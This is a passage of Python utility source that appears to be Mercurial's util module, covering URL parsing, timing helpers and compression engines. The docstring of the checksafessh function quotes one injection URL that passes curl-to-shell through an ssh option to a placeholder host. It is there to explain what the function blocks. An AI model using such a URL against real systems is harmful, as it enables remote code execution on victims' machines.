                     if type(fp) is file:
                         fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
                     if fastpath:
                         return fp
                     else:
                         return _safeiterfile(fp)
             else:
                 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
                 def iterfile(fp):
                     return fp
             def iterlines(iterator):
                 for chunk in iterator:
                     for line in chunk.splitlines():
                         yield line
             def expandpath(path):
                 return os.path.expanduser(os.path.expandvars(path))
             def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
                 """Return the result of interpolating items in the mapping into string s.
                 prefix is a single character string, or a two character string with
                 a backslash as the first character if the prefix needs to be escaped in
                 a regular expression.
                 fn is an optional function that will be applied to the replacement text
                 just before replacement.
                 escape_prefix is an optional flag that allows using doubled prefix for
                 its escaping.
                 """
                 fn = fn or (lambda s: s)
                 patterns = '|'.join(mapping.keys())
                 if escape_prefix:
                     patterns += '|' + prefix
                     if len(prefix) > 1:
                         prefix_char = prefix[1:]
                     else:
                         prefix_char = prefix
                     mapping[prefix_char] = prefix_char
                 r = remod.compile(br'%s(%s)' % (prefix, patterns))
                 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
             def getport(port):
                 """Return the port for a given network service.
                 If port is an integer, it's returned as is. If it's a string, it's
                 looked up using socket.getservbyname(). If there's no matching
                 service, error.Abort is raised.
                 """
                 try:
                     return int(port)
                 except ValueError:
                     pass
                 try:
                     return socket.getservbyname(pycompat.sysstr(port))
                 except socket.error:
                     raise error.Abort(_("no port number associated with service '%s'")
                                       % port)
             class url(object):
                 r"""Reliable URL parser.
                 This parses URLs and provides attributes for the following
                 components:
                 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
                 Missing components are set to None. The only exception is
                 fragment, which is set to '' if present but empty.
                 If parsefragment is False, fragment is included in query. If
                 parsequery is False, query is included in path. If both are
                 False, both fragment and query are included in path.
                 See http://www.ietf.org/rfc/rfc2396.txt for more information.
                 Note that for backward compatibility reasons, bundle URLs do not
                 take host names. That means 'bundle://../' has a path of '../'.
                 Examples:
                 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
                 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
                 >>> url(b'ssh://[::1]:2200//home/joe/repo')
                 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
                 >>> url(b'file:///home/joe/repo')
                 <url scheme: 'file', path: '/home/joe/repo'>
                 >>> url(b'file:///c:/temp/foo/')
                 <url scheme: 'file', path: 'c:/temp/foo/'>
                 >>> url(b'bundle:foo')
                 <url scheme: 'bundle', path: 'foo'>
                 >>> url(b'bundle://../foo')
                 <url scheme: 'bundle', path: '../foo'>
                 >>> url(br'c:\foo\bar')
                 <url path: 'c:\\foo\\bar'>
                 >>> url(br'\\blah\blah\blah')
                 <url path: '\\\\blah\\blah\\blah'>
                 >>> url(br'\\blah\blah\blah#baz')
                 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
                 >>> url(br'file:///C:\users\me')
                 <url scheme: 'file', path: 'C:\\users\\me'>
                 Authentication credentials:
                 >>> url(b'ssh://joe:xyz@x/repo')
                 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
                 >>> url(b'ssh://joe@x/repo')
                 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
                 Query strings and fragments:
                 >>> url(b'http://host/a?b#c')
                 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
                 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
                 <url scheme: 'http', host: 'host', path: 'a?b#c'>
                 Empty path:
                 >>> url(b'')
                 <url path: ''>
                 >>> url(b'#a')
                 <url path: '', fragment: 'a'>
                 >>> url(b'http://host/')
                 <url scheme: 'http', host: 'host', path: ''>
                 >>> url(b'http://host/#a')
                 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
                 Only scheme:
                 >>> url(b'http:')
                 <url scheme: 'http'>
                 """
                 _safechars = "!~*'()+"
                 _safepchars = "/!~*'()+:\\"
                 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
                 def __init__(self, path, parsequery=True, parsefragment=True):
                     # We slowly chomp away at path until we have only the path left
                     self.scheme = self.user = self.passwd = self.host = None
                     self.port = self.path = self.query = self.fragment = None
                     self._localpath = True
                     self._hostport = ''
                     self._origpath = path
                     if parsefragment and '#' in path:
                         path, self.fragment = path.split('#', 1)
                     # special case for Windows drive letters and UNC paths
                     if hasdriveletter(path) or path.startswith('\\\\'):
                         self.path = path
                         return
                     # For compatibility reasons, we can't handle bundle paths as
                     # normal URLS
                     if path.startswith('bundle:'):
                         self.scheme = 'bundle'
                         path = path[7:]
                         if path.startswith('//'):
                             path = path[2:]
                         self.path = path
                         return
                     if self._matchscheme(path):
                         parts = path.split(':', 1)
                         if parts[0]:
                             self.scheme, path = parts
                             self._localpath = False
                     if not path:
                         path = None
                         if self._localpath:
                             self.path = ''
                             return
                     else:
                         if self._localpath:
                             self.path = path
                             return
                         if parsequery and '?' in path:
                             path, self.query = path.split('?', 1)
                             if not path:
                                 path = None
                             if not self.query:
                                 self.query = None
                         # // is required to specify a host/authority
                         if path and path.startswith('//'):
                             parts = path[2:].split('/', 1)
                             if len(parts) > 1:
                                 self.host, path = parts
                             else:
                                 self.host = parts[0]
                                 path = None
                             if not self.host:
                                 self.host = None
                                 # path of file:///d is /d
                                 # path of file:///d:/ is d:/, not /d:/
                                 if path and not hasdriveletter(path):
                                     path = '/' + path
                         if self.host and '@' in self.host:
                             self.user, self.host = self.host.rsplit('@', 1)
                             if ':' in self.user:
                                 self.user, self.passwd = self.user.split(':', 1)
                             if not self.host:
                                 self.host = None
                         # Don't split on colons in IPv6 addresses without ports
                         if (self.host and ':' in self.host and
                             not (self.host.startswith('[') and self.host.endswith(']'))):
                             self._hostport = self.host
                             self.host, self.port = self.host.rsplit(':', 1)
                             if not self.host:
                                 self.host = None
                         if (self.host and self.scheme == 'file' and
                             self.host not in ('localhost', '127.0.0.1', '[::1]')):
                             raise error.Abort(_('file:// URLs can only refer to localhost'))
                     self.path = path
                     # leave the query string escaped
                     for a in ('user', 'passwd', 'host', 'port',
                               'path', 'fragment'):
                         v = getattr(self, a)
                         if v is not None:
                             setattr(self, a, urlreq.unquote(v))
                 @encoding.strmethod
                 def __repr__(self):
                     attrs = []
                     for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                               'query', 'fragment'):
                         v = getattr(self, a)
                         if v is not None:
                             attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
                     return '<url %s>' % ', '.join(attrs)
                 def __bytes__(self):
                     r"""Join the URL's components back into a URL string.
                     Examples:
                     >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
                     'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
                     >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
                     'http://user:pw@host:80/?foo=bar&baz=42'
                     >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
                     'http://user:pw@host:80/?foo=bar%3dbaz'
                     >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
                     'ssh://user:pw@[::1]:2200//home/joe#'
                     >>> bytes(url(b'http://localhost:80//'))
                     'http://localhost:80//'
                     >>> bytes(url(b'http://localhost:80/'))
                     'http://localhost:80/'
                     >>> bytes(url(b'http://localhost:80'))
                     'http://localhost:80/'
                     >>> bytes(url(b'bundle:foo'))
                     'bundle:foo'
                     >>> bytes(url(b'bundle://../foo'))
                     'bundle:../foo'
                     >>> bytes(url(b'path'))
                     'path'
                     >>> bytes(url(b'file:///tmp/foo/bar'))
                     'file:///tmp/foo/bar'
                     >>> bytes(url(b'file:///c:/tmp/foo/bar'))
                     'file:///c:/tmp/foo/bar'
                     >>> print(url(br'bundle:foo\bar'))
                     bundle:foo\bar
                     >>> print(url(br'file:///D:\data\hg'))
                     file:///D:\data\hg
                     """
                     if self._localpath:
                         s = self.path
                         if self.scheme == 'bundle':
                             s = 'bundle:' + s
                         if self.fragment:
                             s += '#' + self.fragment
                         return s
                     s = self.scheme + ':'
                     if self.user or self.passwd or self.host:
                         s += '//'
                     elif self.scheme and (not self.path or self.path.startswith('/')
                                           or hasdriveletter(self.path)):
                         s += '//'
                         if hasdriveletter(self.path):
                             s += '/'
                     if self.user:
                         s += urlreq.quote(self.user, safe=self._safechars)
                     if self.passwd:
                         s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
                     if self.user or self.passwd:
                         s += '@'
                     if self.host:
                         if not (self.host.startswith('[') and self.host.endswith(']')):
                             s += urlreq.quote(self.host)
                         else:
                             s += self.host
                     if self.port:
                         s += ':' + urlreq.quote(self.port)
                     if self.host:
                         s += '/'
                     if self.path:
                         # TODO: similar to the query string, we should not unescape the
                         # path when we store it, the path might contain '%2f' = '/',
                         # which we should *not* escape.
                         s += urlreq.quote(self.path, safe=self._safepchars)
                     if self.query:
                         # we store the query in escaped form.
                         s += '?' + self.query
                     if self.fragment is not None:
                         s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
                     return s
                 __str__ = encoding.strmethod(__bytes__)
                 def authinfo(self):
                     user, passwd = self.user, self.passwd
                     try:
                         self.user, self.passwd = None, None
                         s = bytes(self)
                     finally:
                         self.user, self.passwd = user, passwd
                     if not self.user:
                         return (s, None)
                     # authinfo[1] is passed to urllib2 password manager, and its
                     # URIs must not contain credentials. The host is passed in the
                     # URIs list because Python < 2.4.3 uses only that to search for
                     # a password.
                     return (s, (None, (s, self.host),
                                 self.user, self.passwd or ''))
                 def isabs(self):
                     if self.scheme and self.scheme != 'file':
                         return True # remote URL
                     if hasdriveletter(self.path):
                         return True # absolute for our purposes - can't be joined()
                     if self.path.startswith(br'\\'):
                         return True # Windows UNC path
                     if self.path.startswith('/'):
                         return True # POSIX-style
                     return False
                 def localpath(self):
                     if self.scheme == 'file' or self.scheme == 'bundle':
                         path = self.path or '/'
                         # For Windows, we need to promote hosts containing drive
                         # letters to paths with drive letters.
                         if hasdriveletter(self._hostport):
                             path = self._hostport + '/' + self.path
                         elif (self.host is not None and self.path
                               and not hasdriveletter(path)):
                             path = '/' + path
                         return path
                     return self._origpath
                 def islocal(self):
                     '''whether localpath will return something that posixfile can open'''
                     return (not self.scheme or self.scheme == 'file'
                             or self.scheme == 'bundle')
             def hasscheme(path):
                 return bool(url(path).scheme)
             def hasdriveletter(path):
                 return path and path[1:2] == ':' and path[0:1].isalpha()
             def urllocalpath(path):
                 return url(path, parsequery=False, parsefragment=False).localpath()
             def checksafessh(path):
                 """check if a path / url is a potentially unsafe ssh exploit (SEC)
                 This is a sanity check for ssh urls. ssh will parse the first item as
                 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
                 Let's prevent these potentially exploited urls entirely and warn the
                 user.
                 Raises an error.Abort when the url is unsafe.
                 """
                 path = urlreq.unquote(path)
                 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
                     raise error.Abort(_('potentially unsafe url: %r') %
                                       (pycompat.bytestr(path),))
             def hidepassword(u):
                 '''hide user credential in a url string'''
                 u = url(u)
                 if u.passwd:
                     u.passwd = '***'
                 return bytes(u)
             def removeauth(u):
                 '''remove all authentication information from a url string'''
                 u = url(u)
                 u.user = u.passwd = None
                 return bytes(u)
             timecount = unitcountfn(
                 (1, 1e3, _('%.0f s')),
                 (100, 1, _('%.1f s')),
                 (10, 1, _('%.2f s')),
                 (1, 1, _('%.3f s')),
                 (100, 0.001, _('%.1f ms')),
                 (10, 0.001, _('%.2f ms')),
                 (1, 0.001, _('%.3f ms')),
                 (100, 0.000001, _('%.1f us')),
                 (10, 0.000001, _('%.2f us')),
                 (1, 0.000001, _('%.3f us')),
                 (100, 0.000000001, _('%.1f ns')),
                 (10, 0.000000001, _('%.2f ns')),
                 (1, 0.000000001, _('%.3f ns')),
                 )
             @attr.s
             class timedcmstats(object):
                 """Stats information produced by the timedcm context manager on entering."""
                 # the starting value of the timer as a float (meaning and resulution is
                 # platform dependent, see util.timer)
                 start = attr.ib(default=attr.Factory(lambda: timer()))
                 # the number of seconds as a floating point value; starts at 0, updated when
                 # the context is exited.
                 elapsed = attr.ib(default=0)
                 # the number of nested timedcm context managers.
                 level = attr.ib(default=1)
                 def __bytes__(self):
                     return timecount(self.elapsed) if self.elapsed else '<unknown>'
                 __str__ = encoding.strmethod(__bytes__)
             @contextlib.contextmanager
             def timedcm(whencefmt, *whenceargs):
                 """A context manager that produces timing information for a given context.
                 On entering a timedcmstats instance is produced.
                 This context manager is reentrant.
                 """
                 # track nested context managers
                 timedcm._nested += 1
                 timing_stats = timedcmstats(level=timedcm._nested)
                 try:
                     with tracing.log(whencefmt, *whenceargs):
                         yield timing_stats
                 finally:
                     timing_stats.elapsed = timer() - timing_stats.start
                     timedcm._nested -= 1
             timedcm._nested = 0
             def timed(func):
                 '''Report the execution time of a function call to stderr.
                 During development, use as a decorator when you need to measure
                 the cost of a function, e.g. as follows:
                 @util.timed
                 def foo(a, b, c):
                     pass
                 '''
                 def wrapper(*args, **kwargs):
                     with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
                         result = func(*args, **kwargs)
                     stderr = procutil.stderr
                     stderr.write('%s%s: %s\n' % (
                         ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
                         time_stats))
                     return result
                 return wrapper
             _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
                           ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
             def sizetoint(s):
                 '''Convert a space specifier to a byte count.
                 >>> sizetoint(b'30')
                 >>> sizetoint(b'2.2kb')
                 >>> sizetoint(b'6M')
                 6291456
                 '''
                 t = s.strip().lower()
                 try:
                     for k, u in _sizeunits:
                         if t.endswith(k):
                             return int(float(t[:-len(k)]) * u)
                     return int(t)
                 except ValueError:
                     raise error.ParseError(_("couldn't parse size: %s") % s)
             class hooks(object):
                 '''A collection of hook functions that can be used to extend a
                 function's behavior. Hooks are called in lexicographic order,
                 based on the names of their sources.'''
                 def __init__(self):
                     self._hooks = []
                 def add(self, source, hook):
                     self._hooks.append((source, hook))
                 def __call__(self, *args):
                     self._hooks.sort(key=lambda x: x[0])
                     results = []
                     for source, hook in self._hooks:
                         results.append(hook(*args))
                     return results
             def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
                 '''Yields lines for a nicely formatted stacktrace.
                 Skips the 'skip' last entries, then return the last 'depth' entries.
                 Each file+linenumber is formatted according to fileline.
                 Each line is formatted according to line.
                 If line is None, it yields:
                   length of longest filepath+line number,
                   filepath+linenumber,
                   function
                 Not be used in production code but very convenient while developing.
                 '''
                 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
                     for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
                     ][-depth:]
                 if entries:
                     fnmax = max(len(entry[0]) for entry in entries)
                     for fnln, func in entries:
                         if line is None:
                             yield (fnmax, fnln, func)
                         else:
                             yield line % (fnmax, fnln, func)
             def debugstacktrace(msg='stacktrace', skip=0,
                                 f=procutil.stderr, otherf=procutil.stdout, depth=0):
                 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
                 Skips the 'skip' entries closest to the call, then show 'depth' entries.
                 By default it will flush stdout first.
                 It can be used everywhere and intentionally does not require an ui object.
                 Not be used in production code but very convenient while developing.
                 '''
                 if otherf:
                     otherf.flush()
                 f.write('%s at:\n' % msg.rstrip())
                 for line in getstackframes(skip + 1, depth=depth):
                     f.write(line)
                 f.flush()
             class dirs(object):
                 '''a multiset of directory names from a dirstate or manifest'''
                 def __init__(self, map, skip=None):
                     self._dirs = {}
                     addpath = self.addpath
                     if safehasattr(map, 'iteritems') and skip is not None:
                         for f, s in map.iteritems():
                             if s[0] != skip:
                                 addpath(f)
                     else:
                         for f in map:
                             addpath(f)
                 def addpath(self, path):
                     dirs = self._dirs
                     for base in finddirs(path):
                         if base in dirs:
                             dirs[base] += 1
                             return
                         dirs[base] = 1
                 def delpath(self, path):
                     dirs = self._dirs
                     for base in finddirs(path):
                         if dirs[base] > 1:
                             dirs[base] -= 1
                             return
                         del dirs[base]
                 def __iter__(self):
                     return iter(self._dirs)
                 def __contains__(self, d):
                     return d in self._dirs
             if safehasattr(parsers, 'dirs'):
                 dirs = parsers.dirs
             def finddirs(path):
                 pos = path.rfind('/')
                 while pos != -1:
                     yield path[:pos]
                     pos = path.rfind('/', 0, pos)
             # compression code
             SERVERROLE = 'server'
             CLIENTROLE = 'client'
             compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                                            (u'name', u'serverpriority',
                                                             u'clientpriority'))
             class compressormanager(object):
                 """Holds registrations of various compression engines.
                 This class essentially abstracts the differences between compression
                 engines to allow new compression formats to be added easily, possibly from
                 extensions.
                 Compressors are registered against the global instance by calling its
                 ``register()`` method.
                 """
                 def __init__(self):
                     self._engines = {}
                     # Bundle spec human name to engine name.
                     self._bundlenames = {}
                     # Internal bundle identifier to engine name.
                     self._bundletypes = {}
                     # Revlog header to engine name.
                     self._revlogheaders = {}
                     # Wire proto identifier to engine name.
                     self._wiretypes = {}
                 def __getitem__(self, key):
                     return self._engines[key]
                 def __contains__(self, key):
                     return key in self._engines
                 def __iter__(self):
                     return iter(self._engines.keys())
                 def register(self, engine):
                     """Register a compression engine with the manager.
                     The argument must be a ``compressionengine`` instance.
                     """
                     if not isinstance(engine, compressionengine):
                         raise ValueError(_('argument must be a compressionengine'))
                     name = engine.name()
                     if name in self._engines:
                         raise error.Abort(_('compression engine %s already registered') %
                                           name)
                     bundleinfo = engine.bundletype()
                     if bundleinfo:
                         bundlename, bundletype = bundleinfo
                         if bundlename in self._bundlenames:
                             raise error.Abort(_('bundle name %s already registered') %
                                               bundlename)
                         if bundletype in self._bundletypes:
                             raise error.Abort(_('bundle type %s already registered by %s') %
                                               (bundletype, self._bundletypes[bundletype]))
                         # No external facing name declared.
                         if bundlename:
                             self._bundlenames[bundlename] = name
                         self._bundletypes[bundletype] = name
                     wiresupport = engine.wireprotosupport()
                     if wiresupport:
                         wiretype = wiresupport.name
                         if wiretype in self._wiretypes:
                             raise error.Abort(_('wire protocol compression %s already '
                                                 'registered by %s') %
                                               (wiretype, self._wiretypes[wiretype]))
                         self._wiretypes[wiretype] = name
                     revlogheader = engine.revlogheader()
                     if revlogheader and revlogheader in self._revlogheaders:
                         raise error.Abort(_('revlog header %s already registered by %s') %
                                           (revlogheader, self._revlogheaders[revlogheader]))
                     if revlogheader:
                         self._revlogheaders[revlogheader] = name
                     self._engines[name] = engine
                 @property
                 def supportedbundlenames(self):
                     return set(self._bundlenames.keys())
                 @property
                 def supportedbundletypes(self):
                     return set(self._bundletypes.keys())
                 def forbundlename(self, bundlename):
                     """Obtain a compression engine registered to a bundle name.
                     Will raise KeyError if the bundle type isn't registered.
                     Will abort if the engine is known but not available.
                     """
                     engine = self._engines[self._bundlenames[bundlename]]
                     if not engine.available():
                         raise error.Abort(_('compression engine %s could not be loaded') %
                                           engine.name())
                     return engine
                 def forbundletype(self, bundletype):
                     """Obtain a compression engine registered to a bundle type.
                     Will raise KeyError if the bundle type isn't registered.
                     Will abort if the engine is known but not available.
                     """
                     engine = self._engines[self._bundletypes[bundletype]]
                     if not engine.available():
                         raise error.Abort(_('compression engine %s could not be loaded') %
                                           engine.name())
                     return engine
                 def supportedwireengines(self, role, onlyavailable=True):
                     """Obtain compression engines that support the wire protocol.
                     Returns a list of engines in prioritized order, most desired first.
                     If ``onlyavailable`` is set, filter out engines that can't be
                     loaded.
                     """
                     assert role in (SERVERROLE, CLIENTROLE)
                     attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
                     engines = [self._engines[e] for e in self._wiretypes.values()]
                     if onlyavailable:
                         engines = [e for e in engines if e.available()]
                     def getkey(e):
                         # Sort first by priority, highest first. In case of tie, sort
                         # alphabetically. This is arbitrary, but ensures output is
                         # stable.
                         w = e.wireprotosupport()
                         return -1 * getattr(w, attr), w.name
                     return list(sorted(engines, key=getkey))
                 def forwiretype(self, wiretype):
                     engine = self._engines[self._wiretypes[wiretype]]
                     if not engine.available():
                         raise error.Abort(_('compression engine %s could not be loaded') %
                                           engine.name())
                     return engine
                 def forrevlogheader(self, header):
                     """Obtain a compression engine registered to a revlog header.
                     Will raise KeyError if the revlog header value isn't registered.
                     """
                     return self._engines[self._revlogheaders[header]]
             compengines = compressormanager()
             class compressionengine(object):
                 """Base class for compression engines.
                 Compression engines must implement the interface defined by this class.
                 """
                 def name(self):
                     """Returns the name of the compression engine.
                     This is the key the engine is registered under.
                     This method must be implemented.
                     """
                     raise NotImplementedError()
                 def available(self):
                     """Whether the compression engine is available.
                     The intent of this method is to allow optional compression engines
                     that may not be available in all installations (such as engines relying
                     on C extensions that may not be present).
                     """
                     return True
                 def bundletype(self):
                     """Describes bundle identifiers for this engine.
                     If this compression engine isn't supported for bundles, returns None.
                     If this engine can be used for bundles, returns a 2-tuple of strings of
                     the user-facing "bundle spec" compression name and an internal
                     identifier used to denote the compression format within bundles. To
                     exclude the name from external usage, set the first element to ``None``.
                     If bundle compression is supported, the class must also implement
                     ``compressstream`` and `decompressorreader``.
                     The docstring of this method is used in the help system to tell users
                     about this engine.
                     """
                     return None
                 def wireprotosupport(self):
                     """Declare support for this compression format on the wire protocol.
                     If this compression engine isn't supported for compressing wire
                     protocol payloads, returns None.
                     Otherwise, returns ``compenginewireprotosupport`` with the following
                     fields:
                     * String format identifier
                     * Integer priority for the server
                     * Integer priority for the client
                     The integer priorities are used to order the advertisement of format
                     support by server and client. The highest integer is advertised
                     first. Integers with non-positive values aren't advertised.
                     The priority values are somewhat arbitrary and only used for default
                     ordering. The relative order can be changed via config options.
                     If wire protocol compression is supported, the class must also implement
                     ``compressstream`` and ``decompressorreader``.
                     """
                     return None
                 def revlogheader(self):
                     """Header added to revlog chunks that identifies this engine.
                     If this engine can be used to compress revlogs, this method should
                     return the bytes used to identify chunks compressed with this engine.
                     Else, the method should return ``None`` to indicate it does not
                     participate in revlog compression.
                     """
                     return None
                 def compressstream(self, it, opts=None):
                     """Compress an iterator of chunks.
                     The method receives an iterator (ideally a generator) of chunks of
                     bytes to be compressed. It returns an iterator (ideally a generator)
                     of bytes of chunks representing the compressed output.
                     Optionally accepts an argument defining how to perform compression.
                     Each engine treats this argument differently.
                     """
                     raise NotImplementedError()
                 def decompressorreader(self, fh):
                     """Perform decompression on a file object.
                     Argument is an object with a ``read(size)`` method that returns
                     compressed data. Return value is an object with a ``read(size)`` that
                     returns uncompressed data.
                     """
                     raise NotImplementedError()
                 def revlogcompressor(self, opts=None):
                     """Obtain an object that can be used to compress revlog entries.
                     The object has a ``compress(data)`` method that compresses binary
                     data. This method returns compressed binary data or ``None`` if
                     the data could not be compressed (too small, not compressible, etc).
                     The returned data should have a header uniquely identifying this
                     compression format so decompression can be routed to this engine.
                     This header should be identified by the ``revlogheader()`` return
                     value.
                     The object has a ``decompress(data)`` method that decompresses
                     data. The method will only be called if ``data`` begins with
                     ``revlogheader()``. The method should return the raw, uncompressed
                     data or raise a ``RevlogError``.
                     The object is reusable but is not thread safe.
                     """
                     raise NotImplementedError()
             class _CompressedStreamReader(object):
                 def __init__(self, fh):
                     if safehasattr(fh, 'unbufferedread'):
                         self._reader = fh.unbufferedread
                     else:
                         self._reader = fh.read
                     self._pending = []
                     self._pos = 0
                     self._eof = False
                 def _decompress(self, chunk):
                     raise NotImplementedError()
                 def read(self, l):
                     buf = []
                     while True:
                         while self._pending:
                             if len(self._pending[0]) > l + self._pos:
                                 newbuf = self._pending[0]
                                 buf.append(newbuf[self._pos:self._pos + l])
                                 self._pos += l
                                 return ''.join(buf)
                             newbuf = self._pending.pop(0)
                             if self._pos:
                                 buf.append(newbuf[self._pos:])
                                 l -= len(newbuf) - self._pos
                             else:
                                 buf.append(newbuf)
                                 l -= len(newbuf)
                             self._pos = 0
                         if self._eof:
                             return ''.join(buf)
                         chunk = self._reader(65536)
                         self._decompress(chunk)
                         if not chunk and not self._pending and not self._eof:
                             # No progress and no new data, bail out
                             return ''.join(buf)
             class _GzipCompressedStreamReader(_CompressedStreamReader):
                 def __init__(self, fh):
                     super(_GzipCompressedStreamReader, self).__init__(fh)
                     self._decompobj = zlib.decompressobj()
                 def _decompress(self, chunk):
                     newbuf = self._decompobj.decompress(chunk)
                     if newbuf:
                         self._pending.append(newbuf)
                     d = self._decompobj.copy()
                     try:
                         d.decompress('x')
                         d.flush()
                         if d.unused_data == 'x':
                             self._eof = True
                     except zlib.error:
                         pass
             class _BZ2CompressedStreamReader(_CompressedStreamReader):
                 def __init__(self, fh):
                     super(_BZ2CompressedStreamReader, self).__init__(fh)
                     self._decompobj = bz2.BZ2Decompressor()
                 def _decompress(self, chunk):
                     newbuf = self._decompobj.decompress(chunk)
                     if newbuf:
                         self._pending.append(newbuf)
                     try:
                         while True:
                             newbuf = self._decompobj.decompress('')
                             if newbuf:
                                 self._pending.append(newbuf)
                             else:
                                 break
                     except EOFError:
                         self._eof = True
             class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
                 def __init__(self, fh):
                     super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
                     newbuf = self._decompobj.decompress('BZ')
                     if newbuf:
                         self._pending.append(newbuf)
             class _ZstdCompressedStreamReader(_CompressedStreamReader):
                 def __init__(self, fh, zstd):
                     super(_ZstdCompressedStreamReader, self).__init__(fh)
                     self._zstd = zstd
                     self._decompobj = zstd.ZstdDecompressor().decompressobj()
                 def _decompress(self, chunk):
                     newbuf = self._decompobj.decompress(chunk)
                     if newbuf:
                         self._pending.append(newbuf)
                     try:
                         while True:
                             newbuf = self._decompobj.decompress('')
                             if newbuf:
                                 self._pending.append(newbuf)
                             else:
                                 break
                     except self._zstd.ZstdError:
                         self._eof = True
             class _zlibengine(compressionengine):
                 def name(self):
                     return 'zlib'
                 def bundletype(self):
                     """zlib compression using the DEFLATE algorithm.
                     All Mercurial clients should support this format. The compression
                     algorithm strikes a reasonable balance between compression ratio
                     and size.
                     """
                     return 'gzip', 'GZ'
                 def wireprotosupport(self):
                     return compewireprotosupport('zlib', 20, 20)
                 def revlogheader(self):
                     return 'x'
                 def compressstream(self, it, opts=None):
                     opts = opts or {}
                     z = zlib.compressobj(opts.get('level', -1))
                     for chunk in it:
                         data = z.compress(chunk)
                         # Not all calls to compress emit data. It is cheaper to inspect
                         # here than to feed empty chunks through generator.
                         if data:
                             yield data
                     yield z.flush()
                 def decompressorreader(self, fh):
                     return _GzipCompressedStreamReader(fh)
                 class zlibrevlogcompressor(object):
                     def compress(self, data):
                         insize = len(data)
                         # Caller handles empty input case.
                         assert insize > 0
                         if insize < 44:
                             return None
                         elif insize <= 1000000:
                             compressed = zlib.compress(data)
                             if len(compressed) < insize:
                                 return compressed
                             return None
                         # zlib makes an internal copy of the input buffer, doubling
                         # memory usage for large inputs. So do streaming compression
                         # on large inputs.
                         else:
                             z = zlib.compressobj()
                             parts = []
                             pos = 0
                             while pos < insize:
                                 pos2 = pos + 2**20
                                 parts.append(z.compress(data[pos:pos2]))
                                 pos = pos2
                             parts.append(z.flush())
                             if sum(map(len, parts)) < insize:
                                 return ''.join(parts)
                             return None
                     def decompress(self, data):
                         try:
                             return zlib.decompress(data)
                         except zlib.error as e:
                             raise error.RevlogError(_('revlog decompress error: %s') %
                                                     stringutil.forcebytestr(e))
                 def revlogcompressor(self, opts=None):
                     return self.zlibrevlogcompressor()
             compengines.register(_zlibengine())
             class _bz2engine(compressionengine):
                 def name(self):
                     return 'bz2'
                 def bundletype(self):
                     """An algorithm that produces smaller bundles than ``gzip``.
                     All Mercurial clients should support this format.
                     This engine will likely produce smaller bundles than ``gzip`` but
                     will be significantly slower, both during compression and
                     decompression.
                     If available, the ``zstd`` engine can yield similar or better
                     compression at much higher speeds.
                     """
                     return 'bzip2', 'BZ'
                 # We declare a protocol name but don't advertise by default because
                 # it is slow.
                 def wireprotosupport(self):
                     return compewireprotosupport('bzip2', 0, 0)
                 def compressstream(self, it, opts=None):
                     opts = opts or {}
                     z = bz2.BZ2Compressor(opts.get('level', 9))
                     for chunk in it:
                         data = z.compress(chunk)
                         if data:
                             yield data
                     yield z.flush()
                 def decompressorreader(self, fh):
                     return _BZ2CompressedStreamReader(fh)
             compengines.register(_bz2engine())
             class _truncatedbz2engine(compressionengine):
                 def name(self):
                     return 'bz2truncated'
                 def bundletype(self):
                     return None, '_truncatedBZ'
                 # We don't implement compressstream because it is hackily handled elsewhere.
                 def decompressorreader(self, fh):
                     return _TruncatedBZ2CompressedStreamReader(fh)
             compengines.register(_truncatedbz2engine())
             class _noopengine(compressionengine):
                 def name(self):
                     return 'none'
                 def bundletype(self):
                     """No compression is performed.
                     Use this compression engine to explicitly disable compression.
                     """
                     return 'none', 'UN'
                 # Clients always support uncompressed payloads. Servers don't because
                 # unless you are on a fast network, uncompressed payloads can easily
                 # saturate your network pipe.
                 def wireprotosupport(self):
                     return compewireprotosupport('none', 0, 10)
                 # We don't implement revlogheader because it is handled specially
                 # in the revlog class.
                 def compressstream(self, it, opts=None):
                     return it
                 def decompressorreader(self, fh):
                     return fh
                 class nooprevlogcompressor(object):
                     def compress(self, data):
                         return None
                 def revlogcompressor(self, opts=None):
                     return self.nooprevlogcompressor()
             compengines.register(_noopengine())
             class _zstdengine(compressionengine):
                 def name(self):
                     return 'zstd'
                 @propertycache
                 def _module(self):
                     # Not all installs have the zstd module available. So defer importing
                     # until first access.
                     try:
                         from . import zstd
                         # Force delayed import.
                         zstd.__version__
                         return zstd
                     except ImportError:
                         return None
                 def available(self):
                     return bool(self._module)
                 def bundletype(self):
